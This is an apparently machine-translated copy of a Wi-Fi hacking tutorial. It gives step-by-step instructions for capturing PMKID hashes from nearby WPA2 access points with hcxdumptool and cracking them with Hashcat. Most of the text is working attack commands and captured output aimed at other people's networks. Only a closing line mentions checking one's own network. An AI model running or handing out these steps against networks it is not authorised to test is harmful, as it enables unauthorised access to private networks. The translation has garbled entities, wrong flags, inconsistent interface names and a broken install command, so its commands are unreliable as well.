WPA2 network password cracking has been about the same for many years, but a newer attack requires less interaction and information than previous techniques and has the added advantage of being able to focus on access points without anyone being connected. The latest attack on the PMKID uses Hashcat to crack WPA passwords and allows hackers to find networks with weak passwords more easily.
The old way to crack WPA2 passwords
The old way to crack WPA2 has been around for a long time and means that disconnects a connected device from the access point that we want to try to crack. This has two disadvantages, which are essential for Wi-Fi hackers to understand.
The first drawback is the requirement that someone is connected to the network to attack it. The network password may be weak and very easy to break, but without a device connected for a short start, there is no way to capture a handshake, so no chance of trying to crack it.
The second disadvantage of this tactic is that it is noisy and legally disturbing because it forces you to send packages that intentionally prohibit an authorized user for a service that they pay to use. This type of unauthorized interference is technically a denial of service attack and, if maintained, the same as disrupting a network. It can get you in trouble and is easily detected by some of our earlier manuals.
A new method for cracking passwords
Instead of relying on two-way communication between Wi-Fi devices to attempt to crack the password, an attacker could communicate directly with a vulnerable access point using the new method. On August 4, 2018, a post on the Hashcat forum described a new technique that made use of an attack on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame to capture the required information to try a brutal force attack.
As with the previous attacks on WPA, the attacker must be close to the network that he wants to attack. The goal is to use a Kali-compatible wireless network adapter to collect the necessary information from the network to brutally force the password. Instead of using Aireplay-ng or Aircrack-ng, we use a new wireless attack tool to do this, called hcxtools. tests, and they allow us to communicate with nearby Wi-Fi networks to record WPA handshakes and PMKID hashes. It works similar to Besside-ng because it requires minimal arguments to start an attack from the command line, can be executed against specific goals or goals of convenience and can be quickly executed via SSH on a Raspberry Pi or another device without screen.
After the PMKID has been recorded, the next step is to load the hash into Hashcat and try to crack the password. Here, hcxtools differs from Besside-ng because a conversion step is required to prepare the file for Hashcat. We will use hcxpcaptool to convert our PCAPNG file to one that Hashcat can work with, leaving only the step of selecting a robust list of passwords for your brute-forcing attempts.
It is worth noting that not every network is vulnerable to this attack. Because this is an optional field that is added by some manufacturers, you cannot expect universal success with this technique. Whether you can capture the PMKID depends on whether the manufacturer of the access point preferred you to include an element it contained, and whether you can crack the captured PMKID depends on whether the underlying password is included in your brute-force password list. If neither of these conditions is met, this attack will fail.
To try this attack, you must run Kali Linux and have access to a wireless network adapter that supports monitor mode and package injection. We have several manuals on how to select a compatible wireless network adapter below.
In addition to a Kali-compatible network adapter, ensure that you have fully updated and upgraded your system. If you do not, some packages may be out of date and cause problems during capture.
Recommended: The Alfa AWUS036NHA 2.4 GHz
First, we will install the tools we need. Type the following in a terminal window to download them.
~ # git clone https://github.com/ZerBea/hcxdumptool.git Clones in & # 39; hcxdump tool & # 39; ... remote: list objects: 133, done. remote: objects count: 100% (133/133), ready. external: compress objects: 100% (97/97), ready. remote: Total 2127 (delta 82), reused 76 (delta 36), pack reused 1994 Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB / s, ready. Delta & # 39; s solution: 100% (1434/1434), done.
Then go to the directory and complete the installation with make and then install .
~ # cd hcxdumptool ~ / hcxdumptool # make cc -O3 -Wall -Wextra -std = gnu99 -o hcxpioff hcxpioff.c cc -O3 -Wall -Wextra -std = gnu99 -o hcxdumptool hcxdumptool.c -lcrypto ~ / hcxdumptool # make install cc -O3 -Wall -Wextra -std = gnu99 -o hcxpioff hcxpioff.c cc -O3 -Wall -Wextra -std = gnu99 -o hcxdumptool hcxdumptool.c -lcrypto install -m 0755 -D hcxpioff / usr / local / bin / hcxpioff install -m 0755 -D hcxdumptool / usr / local / bin / hcxdumptool rm -f hcxpioff rm -f hcxdumptool rm -f * .o * ~
When the installation is complete, we will continue to install hxctools. To do this, open a new terminal window or leave the / hexdumptool folder and then install hxctools.
~ / hcxdumptool # cd ~ # git clone https://github.com/ZerBea/hcxtools.git Cloning in & # 39; hcxtools & # 39; ... remote: list objects: 120, done. external: objects count: 100% (120/120), ready. external: compress objects: 100% (82/82), ready. external: total 6196 (delta 77), reused 79 (delta 38), package reused 6076 Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB / s, ready. Delta & # 39; s solution: 100% (4320/4320), ready.
Then go to the directory and execute make and make install as before. If you get an error message, try typing sudo for the command.
~ # cd hcxtools ~ / hcxtools # make mkdir -p .deps cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxwltool.d -o hcxwltool hcxwltool.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / whoismac.d -o whoismac whoismac.c -lcurl cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxmactool.d -o hcxmactool hcxmactool.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxessidtool.d -o hcxessidtool hcxessidtool.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c cc -O3 -Wall -Wextra -std = gnu99 -MMD -MF .deps / wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c Install ~ / hcxtools # make install -m 0755 -D hcxpcapngtool / usr / local / bin / hcxpcapngtool install -m 0755 -D hcxhashtool / usr / local / bin / hcxhashtool install -m 0755 -D hcxpsktool / usr / local / bin / hcxpsktool install -m 0755 -D hcxwltool / usr / local / bin / hcxwltool install -m 0755 -D wlancap2wpasec / usr / local / bin / wlancap2wpasec install -m 0755 -D whoismac / usr / local / bin / whoismac install -m 0755 -D hcxpmkidtool / usr / local / bin / hcxpmkidtool install -m 0755 -D wlanhcx2john / usr / local / bin / wlanhcx2john install -m 0755 -D hcxpcaptool / usr / local / bin / hcxpcaptool install -m 0755 -D hcxhashcattool / usr / local / bin / hcxhashcattool install -m 0755 -D hcxmactool / usr / local / bin / hcxmactool install -m 0755 -D hcxessidtool / usr / local / bin / hcxessidtool install -m 0755 -D hcxhash2cap / usr / local / bin / hcxhash2cap install -m 0755 -D wlanhc2hcx / usr / local / bin / wlanhc2hcx install -m 0755 -D wlanwkp2hcx / usr / local / bin / wlanwkp2hcx install -m 0755 -D wlanhcxinfo / usr / local / bin / wlanhcxinfo install -m 0755 -D wlanhcx2ssid / usr / local / bin / wlanhcx2ssid install -m 0755 -D wlanhcxcat / usr / local / bin / wlanhcxcat install -m 0755 -D wlanpmk2hcx / usr / local / bin / wlanpmk2hcx install -m 0755 -D wlanjohn2hcx / usr / local / bin / wlanjohn2hcx install -m 0755 -D wlancow2hcxpmk / usr / local / bin / wlancow2hcxpmk
Finally, we have to install Hashcat, which should be simple, because it is included as standard in the Kali Linux repo. Simply type the following to install the latest version of Hashcat.
~ / hcxtools # cd ~ install apt hashcat Read package lists ... Ready Build dependency structure Read status information ... Done hashcat is already the newest version (5.1.0 + ds1-1). The following packages were installed automatically and are no longer required: libdouble-conversion1 liblinear3 Use & # 39; apt autoremove & # 39; to delete them. 0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.
With this complete we can continue to set up the wireless network adapter.
Step 2: Prepare the wireless network adapter
After connecting in your Kali-compatible wireless network adapter, you can find the name by typing ifconfig or ip a . It is usually named wlan0. The first step is to put the card in wireless monitor mode so that we can listen to WiFi traffic in the immediate area.
To do this, type the following command in a terminal window, entering the name of your wireless network adapter for wlan0.
~ # airmon-ng start wlan0 Found 3 processes that can cause problems Kill them with & # 39; airmon-ng check kill & # 39; before you place them the card in monitor mode, they will interfere by changing channels and sometimes restore the interface to managed mode PID name 555 NetworkManager 611 wpa_supplicant 6636 dh client Chipset PHY interface driver phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 wireless network adapter (rev 01) (mac80211 monitor mode vif enabled for [phy0] wlan0 on [phy0] wlan0mon) (mac80211 station mode vif disabled for [phy0] wlan0) phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Your wireless network adapter must now have a name as "wlan0mon" and be in monitor mode. You can confirm this by re-executing ifconfig .
Now we are ready to capture the PMKID & # 39; s from devices that we want to attempt to attack. With our wireless network adapter in monitor mode as "wlan1mon", we perform the following command to start the attack.
~ # hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status = 1
Abort this, -i tells the program which interface we use, in this case wlan1mon. The file name to which we save the results can be specified with the flag argument -o . The channel on which we want to scan can be indicated with the flag -c followed by the number of the channel to be scanned.
In our command above, we use wlan1mon to save captured PMKID & # 39; s in a file called "galleria.pcapng." Although you can specify a different value status I have been unsuccessful with any value except 1 .
warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 warning: wlan1mon is probably a monitor interface start recording (stop with ctrl + c) INTERFACE: ...............: wlan1mon FILTER LIST ...............: 0 entries MAC CUSTOMER ...............: fcc233ca8bc5 MAC ACCESS POINT .........: 10ae604b9e82 (increased with each new client) EAPOL TIME-OUT ............: 150000 REPLAYCOUNT ..............: 62439 ANONCE ...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID] [22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5  88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696] [22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247] [22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832] [22:19:42 - 005] e0220203294e -> fcc233ca8bc5  14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 - cc2dc8d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d INFO: cha = 2, rx = 32752, rx (dropped) = 2801, tx = 2205, poked = 18, err = 0
If you have collected enough, you can stop the program by typing C to end the attack. This should produce a PCAPNG file that contains the information we need to attempt a brute-forcing attack, but we must convert it to a format that Hashcat can understand.
To convert our PCAPNG file, we use hcxpcaptool with a few specified arguments. In the same folder where your .PCAPNG file is stored, execute the following command in a terminal window.
~ # hcxpcaptool -E essidlist -I identity list -U usernamelist -z galleriaHC.16800 galleria.pcapng
This command is to tell hxcpcaptool to use the information in the file to help Hashcat understand it with the flags -E -I and -U . The flag -Z is used for the name of the newly converted file that Hashcat must use and the last part of the command is the PCAPNG file that we want to convert.
Executing the command must show us the following.
summary: -------- filename ....................: galleria.pcapng file type ....................: pcapng 1.0 information about file hardware ....: x86_64 file os information ..........: Linux 4.18.0-kali2-amd64 file application information.: hcxdumptool 4.2.1 network type .................: DLT_IEEE802_11_RADIO (127) endianess ....................: small endian reading errors ..................: flawless packages within ...............: 1089 skipped packages ..............: 0 packages with GPS data ........: 0 packages with FCS .............: 732 beacons (with ESSID in it): 49 probe requests ...............: 26 probe reactions ..............: 40 association requests .........: 103 association reactions ........: 204 reselling requests .......: 2 reassocaition reactions ......: 7 authentications (OPEN SYSTEM): 346 authentications (BROADCOM) ...: 114 authentications (APPLE) ......: 1 EAPOL packages ................: 304 EAPOL PMKID & # 39; s .................: 21 best handshakes ..............: 4 (ap-less: 1) 21 PMKID (s) written to galleriahC.16800
Here we can see that we have collected 21 PMKIDs in a short time. Now we can use the "galleriaHC.16800" file in Hashcat to crack network passwords.
Step 5: Select a Password List and Brute Force with Hashcat
To attack the hashes that we have recorded, we will have to choose a good password list. You can find several good password lists to get started in the SecList collection. Once you have a password list, place it in the same folder as the .16800 file that you just converted and run the following command in a terminal window.
~ # hashcat -m 16800 galleriaHC.16800 -a 0 - kernel-accel = 1 -w 4 --force & # 39; topwifipass.txt & # 39;
With this command we launch Hashcat in the mode 16800 that is intended for attacking WPA-PMKID-PBKDF2 network protocols. Next, we specify the name of the file that we want to crack, in this case "galleriaHC.16800." The -a flag tells us which types of attacks we should use, in this case a "straight" attack, and then the -w and – kernel-accel = 1 flags indicates the workload profile with the highest performance. If your computer has performance problems, you can decrease the number in the argument -w .
Next, the option – force ignores all warnings to continue the attack, and the last part of the command indicates the password list that we use to brutally display the PMKID & # 39; s in our file forcing, in this case called "topwifipass.txt".
hashcat (v4.2.1) from ... OpenCL Platform # 1: The pocl project =========================================== * Device # 1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB assignable, 4MCU Hashes: 21 digests; 21 unique summaries, 20 unique salts Bitmaps: 16 bits, 65536 inputs, 0x0000ffff mask, 262144 bytes, 5/13 rotations Rules: 1 Applicable optimizers: * Zero-Byte * Slow Hash SIMD LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Hardware monitoring interface not found on your system. Watchdog: temperature cut-off trigger disabled. * Device # 1: build_opts & # 39; -cl-std = CL1.1 -I OpenCL -I / usr / share / hashcat / OpenCL -D VENDOR ID = 64 -D CUDA_ARCH = 0 -D AMD_ROCM = 0 -D VECT_SIZE = 4 - D DEVICE_TYPE = 2 -D DGST_R0 = 0 -D DGST_R1 = 1 -D DGST_R2 = 2 -D DGST_R3 = 3 -D DGST_ELEM = 4 -D CORE_TYPE = 16800 -D _unroll & # 39; Dictionary cache hit: * File name ..: topwifipass.txt * Passwords.: 4801 * Bytes .....: 45277 * Keyspace ..: 4801 [s] tatus [p] ause [b] ypass [c] heckpoint [q] off =>
Depending on your hardware speed and the size of your password list, this can take quite some time to complete. To view the status at any time, you can press the S key for an update.
While Hashcat breaks, you can check in as it progresses to see if keys have been restored.
Hash.Type ........: WPA-PMKID-PBKDF2 Hash.Target ......: galleriaHC.16800 Time.Started .....: Sun 28 Oct 22:32:57 2018 (7 minutes, 50 sec) Time.Estimated ...: Sun 28 Oct 22:57:50 2018 (17 minutes, 3 sec) Guess.Base .......: File (topwifipass.txt) Guess.Queue ......: 1/1 (100.00%) Speed.Dev. # 1 .....: 64 H / s (15.43ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4 Restored ........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress .........: 30180/96020 (31.43%) Rejected .........: 0/30180 (0.00%) Restore.Point ....: 1508/4801 (31.41%) Candidates. # 1 ....: peter123 -> money man HWon.Dev. # 1 ......: N / A [s] tatus [p] ause [b] ypass [c] heckpoint [q] from => Session ..........: hashcat Status ...........: Active Hash.Type ........: WPA-PMKID-PBKDF2 Hash.Target ......: galleriaHC.16800 Time.Started .....: Sun 28 Oct 22:32:57 2018 (19 minutes, 56 sec) Time.Estimated ...: Sun 28 Oct 22:57:54 2018 (5 minutes, 3 sec) Guess.Base .......: File (topwifipass.txt) Guess.Queue ......: 1/1 (100.00%) Speed.Dev. # 1 .....: 64 H / s (15.24ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4 Restored ........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress .........: 76736/96020 (79.92%) Rejected .........: 0/76736 (0.00%) Restore.Point ....: 3836/4801 (79.90%) Candidates. # 1 ....: monopoli -> mercenary HWon.Dev. # 1 ......: N / A [s] tatus [p] ause [b] ypass [c] heckpoint [q] off =>
When the password list is running low, Hashcat will automatically adjust the workload and give you a final report when it completes.
Approaching final key space - workload adjusted. Session ..........: hashcat Status ...........: exhausted Hash.Type ........: WPA-PMKID-PBKDF2 Hash.Target ......: hotspotcap.16800 Time.Started .....: Sun 28 Oct 18:05:57 2018 (3 minutes, 49 sec) Time.Estimated ...: Sun 28 Oct 18:09:46 2018 (0 sec) Guess.Base .......: File (topwifipass.txt) Guess.Queue ......: 1/1 (100.00%) Speed.Dev. # 1 .....: 42 H / s (15.56ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4 Recovered ........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts Progress .........: 9602/9602 (100.0%) Rejected .........: 2/9602 (0.02%) Restore.Point ....: 4801/4801 (100.0%) Candidates. # 1 ....: 159159159 -> 00001111 HWon.Dev. # 1 ......: N / A Started: Sun 28 Oct 18:05:56 2018 Stopped: Sun 28 Oct 18:09:49 2018
If you have succeeded in cracking passwords, you will see them here. During our test run, none of the PMKIDs that we had collected contained any passwords in our password list, so we were unable to crack any hashes. This will probably also be your result for networks with a strong password, but expect to see results here for networks with a weak password.
The PMKID Hashcat attack makes Wi-Fi attacks easier
While the new attack on Wi-Fi-Fi passwords makes it easier for hackers to try an attack on a target, the same methods that were effective against previous types of WPA cracking remain effective. If your network does not even support the robust security element with the PMKID, this attack has no chance of success. You can check your own network with hcxtools to see if it is susceptible to this attack.
Because these attacks depend on guessing the password that the Wi-Fi network uses, there are two common guesses; The first are users who choose poor or standard bad passwords, such as & # 39; 12345678 & # 39; or & # 39; password & # 39 ;. These will be cracked easily. The second source of password estimates comes from data breaches that reveal millions of real user passwords. Because many users will reuse passwords between different types of accounts, these lists are generally very effective in cracking Wi-Fi networks.
I hope you enjoyed this guide for the new PMKID-based Hashcat attack on WPA2 passwords! If you have questions about this tutorial about cracking WiFi passwords or have a comment, you can reach me on Twitter @KodyKinzie .
Don't miss it: Null Byte & # 39; s collection of Wi-Fi Hacking Guides